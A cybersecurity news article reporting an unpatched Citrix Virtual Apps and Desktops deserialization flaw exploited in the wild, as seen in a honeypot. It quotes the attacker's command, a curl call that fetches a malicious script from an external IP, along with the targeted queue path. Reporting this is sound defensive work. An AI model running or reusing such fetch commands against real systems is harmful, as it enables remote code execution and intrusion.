Cyber Security News

Citrix Virtual Apps & Desktops Zero-Day Vulnerability Exploited in the Wild

A critical new vulnerability has been discovered in Citrix’s Virtual Apps and Desktops solution, which is widely used to facilitate secure remote access to desktop applications now exploited in the wild.

The vulnerability, which remains unpatched, was detailed last week by Watchtowr Labs in a blog post . This flaw poses a significant threat, as the solution is frequently used in environments like call centers to isolate individual workstations from actual desktops, particularly in remote work setups.

Vulnerability Details

Citrix Virtual Apps and Desktops provide remote users access to full desktop environments from various devices, including laptops, tablets, and smartphones.

However, Watchtowr Labs warns that the same technology could be exploited by malicious actors, including ransomware groups. The problem lies in how all desktops are hosted on a single server, meaning a privilege escalation exploit could compromise not just one desktop but the entire server and all active sessions connected to it.

One particularly concerning aspect of Citrix’s solution is its session recording feature. Citrix allows administrators to record user sessions for later review, but the review process relies on a vulnerable .NET deserialization function.

This vulnerability is exploitable without requiring authentication, making it a prime target for cybercriminals. Watchtowr Labs has published proof-of-concept exploit code on GitHub , making it accessible to anyone.

Maximizing Cybersecurity ROI: Expert Tips for SME & MSP Leaders - Attend Free Webinar

Sample Exploit Details

According to SANS report, A sample exploit observed recently highlights the seriousness of the vulnerability. In a honeypot environment, a POST request was sent to a Citrix system, attempting to execute a command that fetched a malicious script from an external server.

The exploit took advantage of a messaging queue used by Citrix (msmq/private$/citrixsmaudeventdata) and sought to execute the following command:

curl http://91.212.166.60/script_xen80-mix.php

Attempts to access the malicious script led to a 404 error, raising speculation that the attacker may be filtering requests based on IP addresses or collecting IP addresses for future attacks.

The attack originated from IP address 192.143.1.40, which is linked to an ISP in Johannesburg, South Africa.

The unpatched vulnerability in Citrix Virtual Apps and Desktops poses a severe risk to organizations relying on the platform for remote access.

Since the exploit allows attackers to execute commands remotely without authentication, it could lead to widespread system compromise. The fact that all desktops are hosted on the same server exacerbates the issue, as an attacker gaining control of one session could potentially control all connected sessions.

Citrix has not yet released a patch for this vulnerability, and organizations using the affected product should be on high alert.

In the meantime, Watchtowr Labs advises organizations to monitor for unusual activity, especially from unfamiliar IP addresses, and to consider implementing additional security measures to mitigate the potential impact of this vulnerability.

Simplify and speed up Threat Analysis Workflow by Auto-detonating Cyber Attacks in a Malware sandbox

Balaji

BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Recent Posts

Zero-Trust Policy Bypass Enables Exploitation of Vulnerabilities and Manipulation of NHI Secrets

A new project has exposed a critical attack vector that exploits protocol vulnerabilities to disrupt…

2 days ago

Threat Actor Sells Burger King Backup System RCE Vulnerability for $4,000

A threat actor known as #LongNight has reportedly put up for sale remote code execution…

2 days ago

Chinese Nexus Hackers Exploit Ivanti Endpoint Manager Mobile Vulnerability

Ivanti disclosed two critical vulnerabilities, identified as CVE-2025-4427 and CVE-2025-4428, affecting Ivanti Endpoint Manager Mobile…

2 days ago

Hackers Target macOS Users with Fake Ledger Apps to Deploy Malware

Hackers are increasingly targeting macOS users with malicious clones of Ledger Live, the popular application…

2 days ago

EU Targets Stark Industries in Cyberattack Sanctions Crackdown

The European Union has escalated its response to Russia’s ongoing campaign of hybrid threats, announcing…

3 days ago

Venice.ai’s Unrestricted Access Sparks Concerns Over AI-Driven Cyber Threats

Venice.ai has rapidly emerged as a disruptive force in the AI landscape, positioning itself as…

3 days ago